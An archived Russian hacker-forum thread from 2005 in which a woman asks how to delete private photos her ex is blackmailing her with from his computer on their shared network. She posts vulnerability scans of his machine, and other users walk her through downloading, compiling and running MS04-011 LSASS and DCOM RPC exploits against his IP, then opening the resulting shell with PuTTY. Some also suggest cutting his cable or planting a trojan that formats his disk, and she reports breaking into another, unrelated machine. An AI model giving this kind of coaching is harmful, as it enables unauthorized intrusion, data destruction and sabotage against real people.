Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Прошу помощи

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Прошу помощи
Имя
Сообщение << Старые топики   Новые топики >>
Прошу помощи - 2005-04-20 23:03:02   
Мила

Сообщений: 6
Оценки: 0
Присоединился: 2005-04-20 22:35:17
Помогите пожалуйста наказать моего бывшего молодого человека. У него есть мои фотографии в достаточно вольном виде, и он шантажирует меня ими. Если бы знала какой он, не стала бы фотографироваться. Мы с ним в одной локальной сети. Можно как-то найти на его компьютере и удалить эти ошибки молодости? Мне сказали, что нужно просканировать его на дырки, я просканировала. Фотки сделаны цифровиком – jpg и лежат скорее всего на диске D.
Если cможете, помогите, плиз. [:pray:]

Извините, что много текста, прикрепить файл не удалось [:(]


Серьезная уязвимость
Удаленное выполнение команд (ms03-043)
Описание

Переполнение буфера обнаружено в Messenger Service в Microsoft windоws. Удаленный атакующий может выполнить произвольный код на уязвимой системе. Проблема связанна с тем, что Messenger Service не проверяет длину сообщения. В результате злонамеренный пользователь может послать сообщение, которое переполнит буфер и выполнит произвольный код на уязвимой системе с привилегиями SYSTEM.
Решение

Установите обновление:
http://www.microsoft.com/technet/security/bulletin/MS03-043.asp

Ссылки

CVE (CAN-2003-0717) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0717


Серьезная уязвимость
Удаленное выполнение команд (ms04-012)
Описание

Возможно получение удаленной командной строки с правами системы из-за переполнения буфера в DCOM RPC сервиса.
Решение

Установите обновление:
http://www.microsoft.com/technet/security/bulletin/MS04-012.mspx

Ссылки

CVE (CAN-2003-0813) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0813
CVE (CAN-2004-0116) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0116
CVE (CAN-2003-0807) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0807
CVE (CAN-2004-0124) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0124


Серьезная уязвимость
Удаленное выполнение команд (ms04-022)
Описание

Возможно получение удаленной командной строки с правами системы из-за переполнения буфера в Task Scheduler сервисе.
Решение

Установите обновление:
http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx

Ссылки

CVE (CAN-2004-0212) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0212
Bugtraq (Bid 10708): http://www.securityfocus.com/bid/10708
http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
http://www.securitylab.ru/46383.html


Подозрение на уязвимость
Возможна атака FTP bounce (обход файрвола)
Описание

Возможно сканирование внутренней сети или подключение к внутренним ресурсам.

ВАЖНО: Возможно, аргументы, посланные с ftp-командой PORT автоматически модифицируются одним из файрволов или роутеров, стоящих между сканером и сканируемым хостом.
Решение

Оставить доступ к команде PORT только для адресов, с которыми установлено соединение.

Доступна информация
LanManager и OS
Описание

LanManager: windоws 2000 LAN Manager
OS: windоws 5.0

Доступна информация
MAC-адрес
Описание

MAC-адрес хоста : 00-E0-4C-77-22-19

Доступна информация
Scheduler Service
Описание

Если вы не используете планировщик задач, то разумным будет отключить его, т.к. данный сервис часто используется атакующими для запуска вредоносного кода.
Решение

Заблокируйте сервис следующим ключём реестра:
HKEY_LOCAL_MACHINE
SYSTEM\CurrentControlSet\Services\Schedule
Start = 4

Доступна информация
windоws 5.0
Описание

Вероятная версия операционной системы : windоws 5.0

Доступна информация
Анонимный вход
Описание

Возможен анонимный вход на сервер FTP. При определенных обстоятельствах это может привести к потери данных.
Решение

Закрыть анонимный доступ к FTP серверу если он действительно не нужен.
Ссылки

CVE (CAN-1999-0497) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0497


Доступна информация
Доступ по нулевой сессии
Описание

Эта уязвимость существует только в том случае, если Вы не являетесь Администратором на проверяемом хосте.

Доступ по нулевой сессии представляет собой возможность неавторизованного подключения к хосту с операционной системой основанной на windоws NT (или ОС семейства UNIX с установленным пакетом Samba) с пустым логином и паролем. При включенной нулевой сессии анонимный пользователь может получить большое количество информации о конфигурации системы (список расшаренных ресурсов, список пользователей, список рабочих групп и т.д.). Полученная информация в дальнейшем может быть использованна для попыток несанкционированного доступа.
Решение

windоws:
1. В разделе реестра HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA
установить значение параметра RestrictAnonymous = 2 для windоws 2000/XP/2003 ( 1 для windоws NT3.5/NT4.0 ) ( тип параметра - REG_DWORD )

2. Для windоws 2000/XP/2003:
В разделе реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver
установить значение параметра RestrictNullSessionAccess = 1 ( тип параметра - REG_DWORD )

Для windоws NT3.5/NT4.0:
В разделе реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
установить значение параметра RestrictNullSessAccess = 1 ( тип параметра - REG_DWORD )

3. Перегрузить систему для вступления изменений в силу.

Samba:
Разрешить доступ к серверу только зарегестрированным пользователям:
в файле smb.conf изменить ключ security= share на security= user (или security = server или security = domain ).
Ссылки

CVE (CVE-2000-1200) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1200
http://support.microsoft.com/support/kb/articles/q143/4/74.asp


Доступна информация
Запущена служба DCOM
Описание

На компьютере запущена служба DCOM (Distributed Component оЬjесt Model).
Решение

Отключить службу DCOM, если она действительно не нужна.
Ссылки

CVE (CAN-1999-0658) : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0658

Доступна информация
Имя компьютера и домен
Описание

Имя компьютера : STUDENT
Домен : NETT

Доступна информация
Список транспортных протоколов
Описание

Список транспортных протоколов, установленных на хосте :

устройство (протокол) : \Device\NetBT_Tcpip_{BF106A0E-6B3B-4A5B-A022-7047525DDAE4}
имя сервера : STUDENT
сетевой адрес : 00e04c772219
число подключенных пользователей : 0
домен : NETT

устройство (протокол) : \Device\NetBT_Tcpip_{BF106A0E-6B3B-4A5B-A022-7047525DDAE4}
имя сервера : STUDENT
сетевой адрес : 00e04c772219
число подключенных пользователей : 0
домен : NETT

устройство (протокол) : \Device\NetbiosSmb
имя сервера : STUDENT
сетевой адрес : 000000000000
число подключенных пользователей : 0
домен : NETT

устройство (протокол) : \Device\NetbiosSmb
имя сервера : STUDENT
сетевой адрес : 000000000000
число подключенных пользователей : 1
домен : NETT
Решение

Отключить доступ по нулевой сессии (см. уязвимость "доступ по нулевой сессии") и/или отключить гостевой логин на сервере.

Доступна информация
Список файлов и директорий
Описание

Список файлов и директорий полученных с FTP сервера:
drw-rw-rw- 1 user group 0 Mar 27 18:30 .
drw-rw-rw- 1 user group 0 Mar 27 18:30 ..
drw-rw-rw- 1 user group 0 Jan 1 1980 MOBILE_1
drw-rw-rw- 1 user group 0 Jan 1 1980 MOBILE_2
drw-rw-rw- 1 user group 0 Jan 1 1980 MULTIMEDIA
drw-rw-rw- 1 user group 0 Jan 1 1980 RAZNOE
-rw-rw-rw- 1 user group 584 Jan 27 05:04 privet.txt


А это другой программой.

Отчет о сканировании
18.04.2005 21:29:33
192.168.32.157 (STUDENT)

Round Trip Time (RTT):
Time To Live (TTL): 126
Доменное имя: STUDENT
NetBios имена (8)
STUDENT UNIQUE - Workstation service
STUDENT UNIQUE - File server service
NETT GROUP - Domain name
STUDENT UNIQUE - Messenger service
NETT GROUP - Browser Service Elections
NETT UNIQUE - Master Browser
__MSBROWSE__ GROUP - Master Browser
STUDENT&CAT UNIQUE - Messenger service

Пользователь: STUDENT&CAT
MAC: 00:E0:4C:77:22:19 (REALTEK SEMICONDUCTOR CORP.)
Рабочая группа: NETT
Удаленное управление
Поддерживает Remote Administration Protocol
Поддерживает Remote Procedure Call
Поддерживает Security Account Manager

Время на удаленном компьютере
Время: 18.04.2005 21:31:26
Система загружена: 18.04.2005 6:56:12
Часовой пояс: -240 минут от Гринвича

Транспорт (4)
\Device\NetbiosSmb
Сетевой адрес: STUDENT
Адрес сетевого адаптера: 000000000000
Кол-во клиентов: 0

\Device\NetbiosSmb
Сетевой адрес: STUDENT
Адрес сетевого адаптера: 000000000000
Кол-во клиентов: 1

\Device\NetBT_Tcpip_{BF106A0E-6B3B-4A5B-A022-7047525DDAE4}
Сетевой адрес: STUDENT
Адрес сетевого адаптера: 00e04c772219
Кол-во клиентов: 0

\Device\NetBT_Tcpip_{BF106A0E-6B3B-4A5B-A022-7047525DDAE4}
Сетевой адрес: STUDENT
Адрес сетевого адаптера: 00e04c772219
Кол-во клиентов: 0


Отчет сгенерирован LANSpy 1.0.0.15



Post #: 1
Прошу помощи - 2005-04-20 23:51:17   
DiavoloS[666]

Сообщений: 5
Оценки: 0
Присоединился: 2005-04-19 18:49:30
Если просто хочеш наказать парня и сделать так чтобы инфа не улилась в сеть просто перереж ему сетевой провод,а лучше дёрни за него так чтобы разорвало хабы на крыше…это будет стоить ему денег…потом есть такие вещи как Анти ламер бэкдор,ес у него нет файр вола то закинуть ему троян можно буз проблем,прикрепив к чему нить…ай пи ты знаеш…ну а там формат с:…
Post #: 2
Прошу помощи - 2005-04-21 02:31:39   
Nelli

Сообщений: 9
Оценки: 0
Присоединился: 2004-04-26 00:17:49
попробуй вот этот ксплоит http://www.securitylab.ru/tools/_services/download/redirect.asp?href=http://www.securitylab.ru/_Exploits/2004/04/04252004.ms04011lsass.rar
Post #: 3
Прошу помощи - 2005-04-22 20:54:09   
Мила

Сообщений: 6
Оценки: 0
Присоединился: 2005-04-20 22:35:17
quote:

—————-<BR>Цитата: Дата:21.04.2005 2:31:39, Автор:Nelli ::
попробуй вот этот ксплоит http://www.securitylab.ru/tools/_services/download/redirect.asp?href=http://www.securitylab.ru/_Exploits/2004/04/04252004.ms04011lsass.rar
—————-



Спасибо за совет, только что делать с этим ксплоитом?
Post #: 4
Прошу помощи - 2005-04-25 16:36:44   
.:[ksuri]:.

Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
1. скачиваешь
2. если надо, распаковываешь архив
3. пуск -> выполнить -> cmd (ввести в строке)
4. видишь черное окно и мигающий курсор
5. пишешь: cd &lt;путь к тому файлу который ты распаковала (2)&gt;, то есть если ты распаковала архив в С:\temp то и писать надо cd C:\temp
6. пишешь имя файла (.ехе)
7. следуешь инструкциям

если че не понятно, пиши опять[sm=16.gif]
Post #: 5
Прошу помощи - 2005-04-25 18:08:34   
Мила

Сообщений: 6
Оценки: 0
Присоединился: 2005-04-20 22:35:17
Архив распаковала, а там два файла. Один ms04011lsass.c, а второй sbaanetapi.dll.
Чем их запускать?
Post #: 6
Прошу помощи - 2005-04-25 20:20:48   
][eaL

Сообщений: 417
Оценки: 0
Присоединился: 2004-03-28 15:47:07
quote:

—————-<BR>Цитата: Дата:25.04.2005 18:08:34, Автор:Мила ::
Архив распаковала, а там два файла. Один ms04011lsass.c, а второй sbaanetapi.dll.<BR>Чем их запускать?
—————-


Microsoft Visual Studio C++. В этой проге их надо скомпилировать для начала, а потом уже запускать exe'шник:)
Post #: 7
Прошу помощи - 2005-05-02 01:47:51   
Wasp_@nti_cheater

Сообщений: 247
Оценки: 0
Присоединился: 2004-12-02 01:07:59
Этож не законно ты что.[sm=1.gif]Но я думаю, ты никому не расскажешь.

Делай раз http://www.xakep.ru/post/19470/kaht2.zip - скачиваешь(далеко ходить не надо[sm=1.gif])
Два, распаковываешь(надеюсь этому учить не надо).
узнаешь IP адрес, его можно узнать , хм, ну хотябы пингой(упс) т.е командой ping.
Её формат такой – ping его имя в сети (как я понял это - STUDENT ).

Т.е – ping STUDENT
(Должно получиться что-то подобное)
Обмен пакетами с STUDENT [84.204.*.*] по 32 байт:

Ответ от 84.204.110.23: число байт=32 время<1мс TTL=222
Ответ от 84.204.*.*: число байт=32 время<1мс TTL=222


Дак вот 84.204.110.23 - это его IP.

Как запустить команду пинг, как я подозреваю опять же ты не знаешь…
Хорошо, повторяй за мной [sm=1.gif] Пуск Выполнить, сюда пиши cmd!
Затем в появившееся окно пиши ping STUDENT.
Далее в этомже окне пиши диск_на котором лежит kaHt2.exe и путь до него и вводи его IP -1, а затем +1 в последнем октете, короче.
Т.е C:\bla-bal-bal\bla=bla\kaHt2.exe 84.204.110.22 84.204.110.24

Затем если все нормально, открываеться щелл, короче окно,вида :
С:\windоws\system32\>
Далее тебе надо найти эти фотки и удалить их(хотя если он не дурак то сделал backup да и востановить их не проблема)
Ух, для этого тебе понадобиться 3 команды а именно – cd (change directory)переход в др каталог(папку), dir(directory) просмотр содержимого, del(delete) собственно удаление.
Также может понадобиться смена диска. просто имя диска и : (D:).
Надеюсь я это писал не зря…..
Алаверды и всё что я писал это только в ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ.[sm=1.gif]
Это стало возможным из-за этого
[p]
quote:

—————-<BR>Цитата: Дата:20.04.2005 23:03:02, Автор: Мила ::
<BR> Возможно получение удаленной командной строки с правами системы из-за переполнения буфера в DCOM RPC сервиса.<BR><BR>
—————-


Можно конечно и подругому, но это если тебе этого не достаточно…[sm=9.gif]
Post #: 8
Прошу помощи - 2005-05-05 21:53:19   
Мила

Сообщений: 6
Оценки: 0
Присоединился: 2005-04-20 22:35:17
quote:

—————-<BR>Цитата: Дата:25.04.2005 20:20:48, Автор:Xeal ::
quote:

—————-<BR>Цитата: Дата:25.04.2005 18:08:34, Автор:Мила ::
Архив распаковала, а там два файла. Один ms04011lsass.c, а второй sbaanetapi.dll.<BR>Чем их запускать?
—————-

<BR>Microsoft Visual Studio C++. В этой проге их надо скомпилировать для начала, а потом уже запускать exe'шник:)
—————-



Никогда бы не подумала, что мне пригодятся мои конспекты по АЯП [sm=1.gif]

С трудом разобралась с компиляцией, но таки все получилось. Приятно :)
Только вот что пишет этот эксплоит

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
— Coded by .::[ houseofdabus ]::. —

Usage:

1 <target> <victim IP> <bindport> [connectback IP] [options]

Targets:
0 [0x01004600]: WinXP Professional [universal] lsass.exe
1 [0x7515123c]: Win2k Professional [universal] netrap.dll
2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll

Options:
-t: Detect remote OS:
windоws 5.1 - WinXP
windоws 5.0 - Win2k


C:\>lsass\lsass 1 192.168.32.157 32444 192.168.249.62

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
— Coded by .::[ houseofdabus ]::. —

  • Target: IP: 192.168.32.157: OS: Win2k Professional [universal] netrap.dll<BR><BR>
  • Connecting to 192.168.32.157:445 … OK<BR>
  • Attacking … OK<BR><BR>C:\lsass\&gt;<BR><BR><BR><BR>Я все правильно сделала? А может у него фаервол стоит? Тогда вообще ничего нельзя сделать? [sm=em88.gif]
  • Post #: 9
    Прошу помощи - 2005-05-05 22:16:36   
    Мила

    Сообщений: 6
    Оценки: 0
    Присоединился: 2005-04-20 22:35:17
    quote:

    —————-<BR>Цитата: Дата:02.05.2005 1:47:51, Автор:Wasp_@nti_cheater ::
    &amp;amp;#1069;тож не законно ты что.[sm=1.gif]Но я думаю, ты никому не расскажешь.<BR><BR>Делай раз http://www.xakep.ru/post/19470/kaht2.zip - скачиваешь(далеко ходить не надо[sm=1.gif])<BR>Два, распаковываешь(надеюсь этому учить не надо).<BR>узнаешь IP адрес, его можно узнать , хм, ну хотябы пингой(упс) т.е командой ping.<BR>Её формат такой – ping его имя в сети (как я понял это - STUDENT ).<BR><BR>Т.е – ping STUDENT<BR>(Должно получиться что-то подобное)<BR>Обмен пакетами с STUDENT [84.204.*.*] по 32 байт:<BR><BR>Ответ от 84.204.110.23: число байт=32 время&amp;amp;lt;1мс TTL=222<BR>Ответ от 84.204.*.*: число байт=32 время&amp;amp;lt;1мс TTL=222<BR>…<BR><BR>Дак вот 84.204.110.23 - это его IP.<BR><BR>Как запустить команду пинг, как я подозреваю опять же ты не знаешь…<BR>Хорошо, повторяй за мной [sm=1.gif] Пуск Выполнить, сюда пиши cmd!<BR>Затем в появившееся окно пиши ping STUDENT.<BR>Далее в этомже окне пиши диск_на котором лежит kaHt2.exe и путь до него и вводи его IP -1, а затем +1 в последнем октете, короче.<BR>Т.е C:la-bal-balla=blakaHt2.exe 84.204.110.22 84.204.110.24<BR><BR>Затем если все нормально, открываеться щелл, короче окно,вида : <BR>С:windоwssystem32&amp;amp;gt;<BR>Далее тебе надо найти эти фотки и удалить их(хотя если он не дурак то сделал backup да и востановить их не проблема)<BR>Ух, для этого тебе понадобиться 3 команды а именно – cd (change directory)переход в др каталог(папку), dir(directory) просмотр содержимого, del(delete) собственно удаление.<BR>Также может понадобиться смена диска. просто имя диска и : (D:).<BR>Надеюсь я это писал не зря…..<BR> Алаверды и всё что я писал это только в ОЗНАКОМИТЕЛ&amp;amp;#1068;НЫХ ЦЕЛЯХ.[sm=1.gif]<BR>&amp;amp;#1069;то стало возможным из-за этого<BR>[p]
    quote:

    —————-<BR>Цитата: Дата:20.04.2005 23:03:02, Автор: Мила ::
    <BR> Возможно получение удаленной командной строки с правами системы из-за переполнения буфера в DCOM RPC сервиса.<BR><BR>
    —————-

    <BR>Можно конечно и подругому, но это если тебе этого не достаточно…[sm=9.gif]
    —————-




    Конечно я никому не расскажу ;-)

    Спасибо за подробное объяснение. Пройти на его компьютер у меня не получилось :(

    - Connecting to 192.168.32.157
    Sending Exploit to a [Win2k] Server…FAILED

    Я попробовала свою сеть просканировать и зашла на один компьютер [sm=go139.gif] Это оказалось так интересно. Может быть мне стать женщиной-хакером [sm=9.gif]

    Только у меня вопрос, можно как-то из командной строки поискать файлы с определенным именем или, допустим, .jpg?

    Как же все таки зайти к нему на компьютер? Неужели совсем никак.
    Post #: 10
    Прошу помощи - 2005-05-06 00:16:41   
    ][eaL

    Сообщений: 417
    Оценки: 0
    Присоединился: 2004-03-28 15:47:07
    quote:

    —————-<BR>Цитата: Дата:05.05.2005 22:16:36, Автор:Мила ::
    quote:

    —————-<BR>Цитата: Дата:02.05.2005 1:47:51, Автор:Wasp_@nti_cheater ::
    &amp;amp;amp;amp;#1069;тож не законно ты что.[sm=1.gif]Но я думаю, ты никому не расскажешь.<BR><BR>Делай раз http://www.xakep.ru/post/19470/kaht2.zip - скачиваешь(далеко ходить не надо[sm=1.gif])<BR>Два, распаковываешь(надеюсь этому учить не надо).<BR>узнаешь IP адрес, его можно узнать , хм, ну хотябы пингой(упс) т.е командой ping.<BR>Её формат такой – ping его имя в сети (как я понял это - STUDENT ).<BR><BR>Т.е – ping STUDENT<BR>(Должно получиться что-то подобное)<BR>Обмен пакетами с STUDENT [84.204.*.*] по 32 байт:<BR><BR>Ответ от 84.204.110.23: число байт=32 время&amp;amp;amp;amp;lt;1мс TTL=222<BR>Ответ от 84.204.*.*: число байт=32 время&amp;amp;amp;amp;lt;1мс TTL=222<BR>…<BR><BR>Дак вот 84.204.110.23 - это его IP.<BR><BR>Как запустить команду пинг, как я подозреваю опять же ты не знаешь…<BR>Хорошо, повторяй за мной [sm=1.gif] Пуск Выполнить, сюда пиши cmd!<BR>Затем в появившееся окно пиши ping STUDENT.<BR>Далее в этомже окне пиши диск_на котором лежит kaHt2.exe и путь до него и вводи его IP -1, а затем +1 в последнем октете, короче.<BR>Т.е C:la-bal-balla=blakaHt2.exe 84.204.110.22 84.204.110.24<BR><BR>Затем если все нормально, открываеться щелл, короче окно,вида : <BR>С:windоwssystem32&amp;amp;amp;amp;gt;<BR>Далее тебе надо найти эти фотки и удалить их(хотя если он не дурак то сделал backup да и востановить их не проблема)<BR>Ух, для этого тебе понадобиться 3 команды а именно – cd (change directory)переход в др каталог(папку), dir(directory) просмотр содержимого, del(delete) собственно удаление.<BR>Также может понадобиться смена диска. просто имя диска и : (D:).<BR>Надеюсь я это писал не зря…..<BR> Алаверды и всё что я писал это только в ОЗНАКОМИТЕЛ&amp;amp;amp;amp;#1068;НЫХ ЦЕЛЯХ.[sm=1.gif]<BR>&amp;amp;amp;amp;#1069;то стало возможным из-за этого<BR>[p]
    quote:

    —————-<BR>Цитата: Дата:20.04.2005 23:03:02, Автор: Мила ::
    <BR> Возможно получение удаленной командной строки с правами системы из-за переполнения буфера в DCOM RPC сервиса.<BR><BR>
    —————-

    <BR>Можно конечно и подругому, но это если тебе этого не достаточно…[sm=9.gif]
    —————-

    <BR><BR><BR>Конечно я никому не расскажу ;-) <BR><BR>Спасибо за подробное объяснение. Пройти на его компьютер у меня не получилось :(<BR><BR> - Connecting to 192.168.32.157<BR> Sending Exploit to a [Win2k] Server…FAILED <BR><BR>Я попробовала свою сеть просканировать и зашла на один компьютер [sm=go139.gif] &amp;amp;#1069;то оказалось так интересно. Может быть мне стать женщиной-хакером [sm=9.gif] <BR><BR>Только у меня вопрос, можно как-то из командной строки поискать файлы с определенным именем или, допустим, .jpg?<BR><BR>Как же все таки зайти к нему на компьютер? Неужели совсем никак.
    —————-



    Ну что я могу сказать?:). Молодец!!![sm=9.gif] А насчет поиска файлов… Даже и не знаю:). Сам давно cmd не пользовался…
    Post #: 11
    Прошу помощи - 2005-05-06 00:18:59   
    Wasp_@nti_cheater

    Сообщений: 247
    Оценки: 0
    Присоединился: 2004-12-02 01:07:59
    Всё получвилось, и с первым сплойтом(он шелл открыл, как я понял из твоего куска на 32444 порту!)!!!!
    Теперь качай http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
    Скачала? Молодец, теперь запускай, вводи в поле Host Name(or IP adress)т.е. 192.168.32.157
    в поле порт 32444, протокол RAW. Дальше, если всё нормально откроеться окно,
    с приглашением командной строки вида: C:\windоws\system32> (при дефолтной установки винды).
    Ну скажем ессть такая команда, точнее это модификация команды dir.
    Хотел конечно ответить RTFM, но ведь это для благородной цели, т.е. в целях обучения [sm=9.gif].
    Вобщем надо перейти, в корень диска. Можно сделать 3-мя путями.
    1 – командой cd \
    2 – буква диска: т.е. C:
    3 – рассматривать не будем кому надо сам(а) найдет или спросит.
    Виполняешь команду dir *.jpg /s /p
    *.jpg - это ишет все джипэги
    /s - это во всех вложенних папках, данной папки(для этого переходили в корень)
    /p - Для удобства, анализа, выводит полный экран потом останавливаеться(ждет нажатия любой клавиши), и т.д.
    Вот вроде и всё, а про хакерство, лучше не надо, ЭТОЖ НЕ ЗАКОННО.
    Помни хакерство это неспособ заработать, это стиль жизни.
    Post #: 12
    Прошу помощи - 2005-05-06 19:37:53   
    Мила

    Сообщений: 6
    Оценки: 0
    Присоединился: 2005-04-20 22:35:17
    quote:

    —————-<BR>Цитата: Дата:06.05.2005 0:18:59, Автор:Wasp_@nti_cheater ::
    Всё получвилось, и с первым сплойтом(он шелл открыл, как я понял из твоего куска на 32444 порту!)!!!!<BR>Теперь качай http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe<BR>Скачала? Молодец, теперь запускай, вводи в поле Host Name(or IP adress)т.е. 192.168.32.157<BR>в поле порт 32444, протокол RAW. Дальше, если всё нормально откроеться окно, <BR>с приглашением командной строки вида: C:windоwssystem32&amp;amp;gt; (при дефолтной установки винды).<BR>Ну скажем ессть такая команда, точнее это модификация команды dir.<BR>Хотел конечно ответить RTFM, но ведь это для благородной цели, т.е. в целях обучения [sm=9.gif].<BR>Вобщем надо перейти, в корень диска. Можно сделать 3-мя путями.<BR>1 – командой cd \n<BR>2 – буква диска: т.е. C:<BR>3 – рассматривать не будем кому надо сам(а) найдет или спросит.<BR>Виполняешь команду dir *.jpg /s /p<BR>*.jpg - это ишет все джипэги<BR>/s - это во всех вложенних папках, данной папки(для этого переходили в корень)<BR>/p - Для удобства, анализа, выводит полный экран потом останавливаеться(ждет нажатия любой клавиши), и т.д.<BR>Вот вроде и всё, а про хакерство, лучше не надо, &amp;amp;#1069;ТОЖ НЕ ЗАКОННО.<BR>Помни хакерство это неспособ заработать, это стиль жизни.
    —————-




    putty.exe у меня и так уже есть. У нас интернет раньше с помощью нее открывался. А сейчас светофорчик.

    Только не получается зайти на этот порт :( В ответ получаю PuTTY Fatal Error
    Netwiork Error: Connection Refused
    Ok

    А вот попробовать поискать на диске .jpg получилось! Здорово, все само ищется!
    Post #: 13
    Страниц:  [1]
    Все форумы >> [В Сети] >> Прошу помощи







    Связаться:
    Вопросы по сайту / xakep@glc.ru

    Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.